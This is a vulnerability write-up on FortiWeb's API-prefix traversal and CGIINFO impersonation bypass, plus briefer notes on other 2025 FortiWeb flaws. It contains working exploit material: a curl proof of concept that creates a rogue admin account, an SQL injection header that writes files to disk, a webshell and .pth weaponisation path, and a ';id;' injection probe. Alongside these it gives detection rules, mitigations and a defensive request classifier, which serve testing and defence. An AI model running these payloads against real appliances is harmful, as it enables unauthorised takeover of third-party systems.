Fortinet FortiWeb - Auth bypass via API-prefix traversal and CGIINFO impersonation


Overview

Fortinet FortiWeb exposes its main CGI dispatcher at /cgi-bin/fwbcgi. A chain of two flaws lets an unauthenticated remote attacker:

  • Reach fwbcgi by starting the URL with a valid API prefix and traversing directories.
  • Impersonate any user (including the built-in admin) by supplying a special HTTP header that the CGI trusts as the caller's identity.

Vendor advisory: FG‑IR‑25‑910 (CVE‑2025‑64446). Exploitation has been observed in the wild to create persistent admin users.

Affected versions (as publicly listed):

  • 8.0 < 8.0.2
  • 7.6 < 7.6.5
  • 7.4 < 7.4.10
  • 7.2 < 7.2.12
  • 7.0 < 7.0.12
  • 6.4 ≤ 6.4.3
  • 6.3 ≤ 6.3.23

FortiWeb 8.0.2 returns HTTP 403 for the traversal probe below.

Quick vulnerability test

  • Path traversal from the API prefix to fwbcgi:
GET /api/v2.0/cmdb/system/admin/../../../../../cgi-bin/fwbcgi HTTP/1.1
Host: <target>
  • Interpretation: HTTP 200 → likely vulnerable; HTTP 403 → patched.

Root-cause chain

  1. API-prefix path traversal to an internal CGI
  • Any request path that starts with a valid FortiWeb API prefix (e.g., /api/v2.0/cmdb/ or /api/v2.0/cmd/) can use ../ to traverse to /cgi-bin/fwbcgi.
  2. Minimal-body validation bypass
  • Once fwbcgi is reached, the first gate performs a permissive JSON check driven by a per-path file under /var/log/inputcheck/. If the file does not exist, the check passes immediately. If it exists, the body only needs to be valid JSON. Use {} as the minimal accepted body.
  3. Header-driven user impersonation
  • The application reads the CGI environment variable HTTP_CGIINFO (derived from the HTTP header CGIINFO), Base64-decodes it, parses the JSON, and copies attributes directly into the login context, enabling the domain/VDOM. Keys of interest:
  • username, loginname, vdom, profname
  • Example JSON to impersonate the existing built-in admin:
{
"username": "admin",
"profname": "prof_admin",
"vdom": "root",
"loginname": "admin"
}

Base64 of the above (as used in the wild):

eyJ1c2VybmFtZSI6ICJhZG1pbiIsICJwcm9mbmFtZSI6ICJwcm9mX2FkbWluIiwgInZkb20iOiAicm9vdCIsICJsb2dpbm5hbWUiOiAiYWRtaW4ifQ==

End-to-end abuse example (unauthenticated → admin)

  1. Reach /cgi-bin/fwbcgi via the API-prefix traversal.
  2. Supply any valid JSON body (for example, {}) to satisfy the input check.
  3. Send the header CGIINFO: <base64(json)>, where the JSON describes the target identity.
  4. POST the backend JSON that fwbcgi expects in order to perform privileged actions (for example, creating an admin user for persistence).

Minimal cURL PoC

  • Check for traversal exposure:
curl -ik 'https://<host>/api/v2.0/cmdb/system/admin/../../../../../cgi-bin/fwbcgi'
  • Impersonate admin and create a new local admin user:
# Base64(JSON) for admin impersonation
B64='eyJ1c2VybmFtZSI6ICJhZG1pbiIsICJwcm9mbmFtZSI6ICJwcm9mX2FkbWluIiwgInZkb20iOiAicm9vdCIsICJsb2dpbm5hbWUiOiAiYWRtaW4ifQ=='

curl -ik \
-H "CGIINFO: $B64" \
-H 'Content-Type: application/json' \
-X POST \
--data '{"data":{"name":"watchTowr","access-profile":"prof_admin","access-profile_val":"0","trusthostv4":"0.0.0.0/0","trusthostv6":"::/0","type":"local-user","type_val":"0","password":"P@ssw0rd!"}}' \
'https://<host>/api/v2.0/cmdb/system/admin/../../../../../cgi-bin/fwbcgi'

Notes:

  • Any valid JSON body is enough (e.g., {}) if /var/log/inputcheck/<path>.json does not exist.
  • The action schema is FortiWeb-internal; the example above adds a local admin with full permissions.

Other 2025 FortiWeb vulnerabilities worth a quick check

Pre-auth Fabric Connector SQLi → RCE (CVE-2025-25257)

  • Affects 7.6.0–7.6.3, 7.4.0–7.4.7, 7.2.0–7.2.10, 7.0.0–7.0.10. Fixed in 7.6.4 / 7.4.8 / 7.2.11 / 7.0.11.
  • Bug: get_fabric_user_by_token() uses the Authorization: Bearer <token> value directly in a SQL query. An attacker injects SQL that runs as the MySQL user and can write files with SELECT ... INTO OUTFILE, yielding code execution (webshell/.pth loader).
  • Typical attack surface: /api/fabric/device/status (and other Fabric Connector endpoints) over HTTP/HTTPS on the management plane.
  • Quick SQLi test:
curl -sk -X POST \
-H "Authorization: Bearer ' UNION SELECT NULL,NULL,NULL,NULL INTO OUTFILE '/data/var/tmp/pwn.txt' -- -" \
https://<host>/api/fabric/device/status
  • Weaponization: write a .pth into FortiWeb's Python site-packages that runs import os;os.system(...) when the interpreter starts, or drop a CGI under the webroot. Reloading the service executes the payload.
  • Hunting clues: Authorization headers containing quotes/UNION/SELECT; unexpected files under /data/lib/python*/site-packages/ or /data/var/waf/html/ROOT/cgi-bin/.

FortiCloud SSO signature bypass (CVE-2025-59719)

  • Improper SAML signature verification lets an attacker forge FortiCloud SSO responses and log in as admin without credentials.
  • Only exploitable when FortiCloud SSO login is enabled (it is enabled automatically if the appliance was registered through the GUI, unless the checkbox was unticked).
  • Affected (per PSIRT): 8.0.0, 7.6.0–7.6.4, 7.4.0–7.4.9. Fixed in 8.0.1 / 7.6.5 / 7.4.10.

OS command injection in management plane (CVE-2025-58034)

  • Affected: 7.0.0–7.0.11, 7.2.0–7.2.11, 7.4.0–7.4.10, 7.6.0–7.6.5, 8.0.0–8.0.1. Fixed in 7.0.12 / 7.2.12 / 7.4.11 / 7.6.6 / 8.0.2.
  • Practical probe (non-destructive): send a parameter containing ;id; to management HTTP endpoints and look for 500 responses containing command output; block or patch immediately if anything is echoed back.

Detection

  • Requests reaching /cgi-bin/fwbcgi via API-prefix paths containing ../ (e.g., /api/v2.0/cmdb/.../../../../../../cgi-bin/fwbcgi).
  • Presence of a CGIINFO header carrying Base64 JSON with the keys username/loginname/vdom/profname.
  • Fabric Connector SQLi: Authorization headers containing SQL metacharacters, unexpected files in Python site-packages/CGI dirs, hits on /api/fabric/device/status from internet IPs.
  • FortiCloud SSO: unexpected SAML issuers or audience values in /var/log/ssod.
  • Backend artifacts:
    • Per-path files under /var/log/inputcheck/ (gate configuration).
    • Unexpected admin creation and configuration changes.
  • Quick confirmation: the traversal probe returns 200 (exposed) vs 403 (blocked in fixed builds).

Mitigation

  • Upgrade to the fixed releases (e.g., 8.0.2, 7.6.5, 7.4.10, 7.2.12, 7.0.12) per the vendor advisory.
  • Also patch the other 2025 bugs: SQLi (7.6.4/7.4.8/7.2.11/7.0.11), SSO bypass (8.0.1/7.6.5/7.4.10), command injection (7.6.6/7.4.11/7.2.12/7.0.12/8.0.2).
  • Until patched:
    • Do not expose the FortiWeb management plane to unused or untrusted networks.
    • Add reverse-proxy/WAF rules to block:
      • Paths starting with /api/ that contain ../cgi-bin/fwbcgi.
      • Requests carrying a CGIINFO header.
      • Fabric Connector calls with SQL metacharacters in Authorization.
      • SAML endpoints from the internet if FortiCloud SSO is not in use.
  • Monitor and alert on the detection clues listed above.
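A defender-side request classifier covering the CGIINFO decoding described in the root-cause chain and the detection/blocking indicators above, added here as an example that is not part of the original page or of any Fortinet code. The sample requests and the host name are constructed, and the ../ normalisation only approximates how the real dispatcher resolves paths.

```python
import base64
import json
import posixpath
import re
from urllib.parse import unquote

# Identity keys the CGIINFO gate copies into the login context.
IDENTITY_KEYS = {"username", "loginname", "vdom", "profname"}
# Crude SQL-metacharacter check for the Fabric Connector bearer token (CVE-2025-25257).
SQL_META = re.compile(r"['\"]|\bUNION\b|\bSELECT\b|INTO\s+OUTFILE", re.IGNORECASE)

def normalize_path(raw_path):
    """Percent-decode the path and collapse ../ segments, approximating a lax dispatcher."""
    path = unquote(raw_path.split("?", 1)[0])
    return posixpath.normpath(path)

def decode_cgiinfo(value):
    """Return the identity keys carried by a CGIINFO header value, or an empty set."""
    try:
        obj = json.loads(base64.b64decode(value, validate=True))
    except ValueError:  # covers bad base64 (binascii.Error), bad UTF-8 and bad JSON
        return set()
    return IDENTITY_KEYS & set(obj) if isinstance(obj, dict) else set()

def classify_request(path, headers):
    """Return the reasons to block/alert on one request; an empty list means clean."""
    hdrs = {k.lower(): v for k, v in headers.items()}
    reasons = []
    if path.startswith("/api/") and ".." in unquote(path) \
            and normalize_path(path).startswith("/cgi-bin/fwbcgi"):
        reasons.append("API-prefix traversal to /cgi-bin/fwbcgi (CVE-2025-64446)")
    if "cgiinfo" in hdrs:
        keys = decode_cgiinfo(hdrs["cgiinfo"])
        reasons.append("CGIINFO header present" + (f", identity keys {sorted(keys)}" if keys else ""))
    if path.startswith("/api/fabric/") and SQL_META.search(hdrs.get("authorization", "")):
        reasons.append("SQL metacharacters in Authorization on a Fabric Connector endpoint (CVE-2025-25257)")
    return reasons

# Constructed sample requests (not captured traffic); the CGIINFO value is the one quoted above.
SAMPLE_REQUESTS = [
    ("/api/v2.0/cmdb/system/admin/../../../../../cgi-bin/fwbcgi",
     {"Host": "fortiweb.internal", "CGIINFO": "eyJ1c2VybmFtZSI6ICJhZG1pbiIsICJwcm9mbmFtZSI6ICJwcm9mX2FkbWluIiwgInZkb20iOiAicm9vdCIsICJsb2dpbm5hbWUiOiAiYWRtaW4ifQ=="}),
    ("/api/fabric/device/status", {"Authorization": "Bearer ' UNION SELECT NULL -- -"}),
    ("/api/v2.0/cmdb/system/admin", {"Authorization": "Bearer valid-token"}),
]

if __name__ == "__main__":
    for path, headers in SAMPLE_REQUESTS:
        print(path, "->", classify_request(path, headers) or ["clean"])
```

Feed it the path and header map from your reverse-proxy or WAF access logs; any non-empty result is a block-or-alert candidate.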
